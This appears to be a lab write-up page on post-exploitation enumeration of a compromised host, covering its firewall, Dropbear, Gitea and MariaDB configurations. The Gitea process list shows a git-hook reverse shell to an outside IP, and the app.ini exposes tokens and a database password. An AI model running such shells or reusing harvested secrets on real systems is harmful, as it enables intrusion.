Beyond
This is the beyond page that an additional post enumeration and assessment are conducted as the root user after compromising the target system.
Firewall
root@roquefort:/# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere anywhere
ACCEPT all -- anywhere anywhere ctstate NEW,RELATED,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:ftp
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh
ACCEPT tcp -- anywhere anywhere tcp dpt:2222
ACCEPT tcp -- anywhere anywhere tcp dpt:3000
ACCEPT icmp -- anywhere anywhere icmp echo-request
ACCEPT icmp -- anywhere anywhere icmp echo-reply
DROP all -- anywhere anywhere
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
ACCEPT all -- anywhere anywhere
ACCEPT tcp -- anywhere anywhere tcp dpt:ftp state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:ftp state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:ssh state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:2222 state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:2222 state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:3000 state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:3000 state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp dpt:domain state NEW,ESTABLISHED
ACCEPT tcp -- anywhere anywhere tcp spt:domain state NEW,ESTABLISHED
ACCEPT udp -- anywhere anywhere udp dpt:domain state NEW,ESTABLISHED
ACCEPT icmp -- anywhere anywhere icmp echo-request
ACCEPT icmp -- anywhere anywhere icmp echo-reply
DROP all -- anywhere anywhere Dropbear
root@roquefort:/# systemctl status dropbear.service
systemctl status dropbear.service
● dropbear.service - LSB: Lightweight SSH server
Loaded: loaded (/etc/init.d/dropbear; generated; vendor preset: enabled)
Active: active (running) since Fri 2024-08-02 15:07:09 EDT; 8 months 1 days ago
Docs: man:systemd-sysv-generator(8)
Process: 457 ExecStart=/etc/init.d/dropbear start (code=exited, status=0/SUCCESS)
Tasks: 1 (limit: 4915)
CGroup: /system.slice/dropbear.service
└─537 /usr/sbin/dropbear -p 2222 -W 65536
root@roquefort:/# cat /etc/init.d/dropbear
#!/bin/sh
### BEGIN INIT INFO
# Provides: dropbear
# Required-Start: $remote_fs $syslog
# Required-Stop: $remote_fs $syslog
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Lightweight SSH server
# Description: Init script for drobpear SSH server. Edit
# /etc/default/dropbear to configure the server.
### END INIT INFO
#
# Do not configure this file. Edit /etc/default/dropbear instead!
#
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
DAEMON=/usr/sbin/dropbear
NAME=dropbear
DESC="Dropbear SSH server"
DEFAULTCFG=/etc/default/dropbear
DROPBEAR_PORT=22
DROPBEAR_EXTRA_ARGS=
NO_START=0
set -e
. /lib/lsb/init-functions
cancel() { echo "$1" >&2; exit 0; };
test ! -r $DEFAULTCFG || . $DEFAULTCFG
test -x "$DAEMON" || cancel "$DAEMON does not exist or is not executable."
test ! -x /usr/sbin/update-service || ! update-service --check dropbear ||
cancel 'The dropbear service is controlled through runit, use the sv(8) program'
[ ! "$DROPBEAR_BANNER" ] || DROPBEAR_EXTRA_ARGS="$DROPBEAR_EXTRA_ARGS -b $DROPBEAR_BANNER"
[ ! -f "$DROPBEAR_RSAKEY" ] || DROPBEAR_EXTRA_ARGS="$DROPBEAR_EXTRA_ARGS -r $DROPBEAR_RSAKEY"
[ ! -f "$DROPBEAR_DSSKEY" ] || DROPBEAR_EXTRA_ARGS="$DROPBEAR_EXTRA_ARGS -r $DROPBEAR_DSSKEY"
[ ! -f "$DROPBEAR_ECDSAKEY" ] || DROPBEAR_EXTRA_ARGS="$DROPBEAR_EXTRA_ARGS -r $DROPBEAR_ECDSAKEY"
test -n "$DROPBEAR_RECEIVE_WINDOW" || \
DROPBEAR_RECEIVE_WINDOW="65536"
case "$1" in
start)
test "$NO_START" = "0" ||
cancel "Starting $DESC: [abort] NO_START is not set to zero in $DEFAULTCFG"
echo -n "Starting $DESC: "
start-stop-daemon --start --quiet --pidfile /var/run/"$NAME".pid \
--exec "$DAEMON" -- -p "$DROPBEAR_PORT" -W "$DROPBEAR_RECEIVE_WINDOW" $DROPBEAR_EXTRA_ARGS
echo "$NAME."
;;
stop)
echo -n "Stopping $DESC: "
start-stop-daemon --stop --quiet --oknodo --pidfile /var/run/"$NAME".pid
echo "$NAME."
;;
restart|force-reload)
test "$NO_START" = "0" ||
cancel "Restarting $DESC: [abort] NO_START is not set to zero in $DEFAULTCFG"
echo -n "Restarting $DESC: "
start-stop-daemon --stop --quiet --oknodo --pidfile /var/run/"$NAME".pid
sleep 1
start-stop-daemon --start --quiet --pidfile /var/run/"$NAME".pid \
--exec "$DAEMON" -- $DROPBEAR_KEYS -p "$DROPBEAR_PORT" -W "$DROPBEAR_RECEIVE_WINDOW" $DROPBEAR_EXTRA_ARGS
echo "$NAME."
;;
status)
status_of_proc -p /var/run/"$NAME".pid $DAEMON $NAME && exit 0 || exit $?
;;
*)
N=/etc/init.d/$NAME
echo "Usage: $N {start|stop|status|restart|force-reload}" >&2
exit 1
;;
esac
exit 0Gitea
root@roquefort:/# systemctl status gitea.service
● gitea.service - Gitea (Git with a cup of tea)
Loaded: loaded (/etc/systemd/system/gitea.service; enabled; vendor preset: enabled)
Active: active (running) since Fri 2024-08-02 15:07:12 EDT; 8 months 1 days ago
Main PID: 747 (gitea)
Tasks: 22 (limit: 4915)
CGroup: /system.slice/gitea.service
├─ 747 /usr/local/bin/gitea web --config /etc/gitea/app.ini
├─1205 /bin/sh -c git-receive-pack '/home/chloe/gitea-repositories/test/rce1.git' git-receive-pack '/home/chloe/gitea-repositories/test/rce1.git'
├─1206 git-receive-pack /home/chloe/gitea-repositories/test/rce1.git
├─1237 bash hooks/post-receive
├─1250 /bin/bash ./hooks/post-receive.d/post-receive
├─1251 bash -c bash -i >& /dev/tcp/192.168.45.249/2222 0>&1
├─1252 bash -i
└─1305 ./pspy64
root@roquefort:/# cat /etc/systemd/system/gitea.service
[Unit]
Description=Gitea (Git with a cup of tea)
After=syslog.target
After=network.target
Requires=mariadb.service
[Service]
RestartSec=2s
Type=simple
User=chloe
Group=chloe
WorkingDirectory=/var/lib/gitea/
ExecStart=/usr/local/bin/gitea web --config /etc/gitea/app.ini
Restart=always
Environment=USER=chloe HOME=/home/chloe GITEA_WORK_DIR=/var/lib/gitea
[Install]
WantedBy=multi-user.target
root@roquefort:/# cat /etc/gitea/app.ini
APP_NAME = Gitea: Git with a cup of tea
RUN_USER = chloe
RUN_MODE = prod
[security]
INTERNAL_TOKEN = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE1ODcwMjE0OTN9.MJ7tNyllwrVX-1KrwFs2n33sVklzKF044wPsPld_TV8
INSTALL_LOCK = true
SECRET_KEY = 6jWzFW4a2otfWHLtnHRE69zuCL2ffh4ZeMF29CBAQfH7xMZPPBXR1XuuZXZ6s8m4
[database]
DB_TYPE = mysql
HOST = 127.0.0.1:3306
NAME = giteadb
USER = gitea
PASSWD = 7d98afcbd8a6c5b8c2dfb07bcbe29d34
SSL_MODE = disable
PATH = data/gitea.db
[repository]
ROOT = /home/chloe/gitea-repositories
[server]
SSH_DOMAIN = localhost
DOMAIN = localhost
HTTP_PORT = 3000
ROOT_URL = http://localhost:3000/
DISABLE_SSH = false
SSH_PORT = 22
LFS_START_SERVER = true
LFS_CONTENT_PATH = /var/lib/gitea/data/lfs
LFS_JWT_SECRET = y3E8LFr-gJTlVmu9JZbDArkyfDW3ca4x7X85yY-w_P8
OFFLINE_MODE = true
[mailer]
ENABLED = false
[service]
REGISTER_EMAIL_CONFIRM = false
ENABLE_NOTIFY_MAIL = false
DISABLE_REGISTRATION = false
ALLOW_ONLY_EXTERNAL_REGISTRATION = false
ENABLE_CAPTCHA = false
REQUIRE_SIGNIN_VIEW = false
DEFAULT_KEEP_EMAIL_PRIVATE = false
DEFAULT_ALLOW_CREATE_ORGANIZATION = true
DEFAULT_ENABLE_TIMETRACKING = true
NO_REPLY_ADDRESS = noreply.example.org
[picture]
DISABLE_GRAVATAR = false
ENABLE_FEDERATED_AVATAR = true
[openid]
ENABLE_OPENID_SIGNIN = true
ENABLE_OPENID_SIGNUP = true
[session]
PROVIDER = file
[log]
MODE = file
LEVEL = Info
ROOT_PATH = /var/lib/gitea/logmariadb
root@roquefort:/# systemctl status mariadb.service
● mariadb.service - MariaDB 10.1.44 database server
Loaded: loaded (/lib/systemd/system/mariadb.service; enabled; vendor preset: enabled)
Active: active (running) since Fri 2024-08-02 15:07:10 EDT; 8 months 1 days ago
Docs: man:mysqld(8)
https://mariadb.com/kb/en/library/systemd/
Process: 742 ExecStartPost=/bin/sh -c systemctl unset-environment _WSREP_START_POSITION (code=exited, status=0/SUCCESS)
Process: 740 ExecStartPost=/etc/mysql/debian-start (code=exited, status=0/SUCCESS)
Process: 535 ExecStartPre=/bin/sh -c [ ! -e /usr/bin/galera_recovery ] && VAR= || VAR=`/usr/bin/galera_recovery`; [ $? -eq 0 ] && systemctl set-environment _WSREP_START_POSITION=$VAR || exit 1 (code=exited, status=0/SUCCESS)
Process: 531 ExecStartPre=/bin/sh -c systemctl unset-environment _WSREP_START_POSITION (code=exited, status=0/SUCCESS)
Process: 508 ExecStartPre=/usr/bin/install -m 755 -o mysql -g root -d /var/run/mysqld (code=exited, status=0/SUCCESS)
Main PID: 633 (mysqld)
Status: "Taking your SQL requests now..."
Tasks: 32 (limit: 4915)
CGroup: /system.slice/mariadb.service
└─633 /usr/sbin/mysqld
root@roquefort:/# cat /lib/systemd/system/mariadb.service | grep -v '^#'
[Unit]
Description=MariaDB 10.1.44 database server
Documentation=man:mysqld(8)
Documentation=https://mariadb.com/kb/en/library/systemd/
After=network.target
[Install]
WantedBy=multi-user.target
Alias=mysql.service
Alias=mysqld.service
[Service]
Type=notify
PrivateNetwork=false
User=mysql
Group=mysql
CapabilityBoundingSet=CAP_IPC_LOCK
ProtectSystem=full
PrivateDevices=true
ProtectHome=true
PermissionsStartOnly=true
ExecStartPre=/usr/bin/install -m 755 -o mysql -g root -d /var/run/mysqld
ExecStartPre=/bin/sh -c "systemctl unset-environment _WSREP_START_POSITION"
ExecStartPre=/bin/sh -c "[ ! -e /usr/bin/galera_recovery ] && VAR= || \
VAR=`/usr/bin/galera_recovery`; [ $? -eq 0 ] \
&& systemctl set-environment _WSREP_START_POSITION=$VAR || exit 1"
ExecStart=/usr/sbin/mysqld $MYSQLD_OPTS $_WSREP_NEW_CLUSTER $_WSREP_START_POSITION
ExecStartPost=/etc/mysql/debian-start
ExecStartPost=/bin/sh -c "systemctl unset-environment _WSREP_START_POSITION"
KillSignal=SIGTERM
SendSIGKILL=no
Restart=on-abort
RestartSec=5s
UMask=007
PrivateTmp=false
TimeoutStartSec=900
TimeoutStopSec=900
LimitNOFILE=16364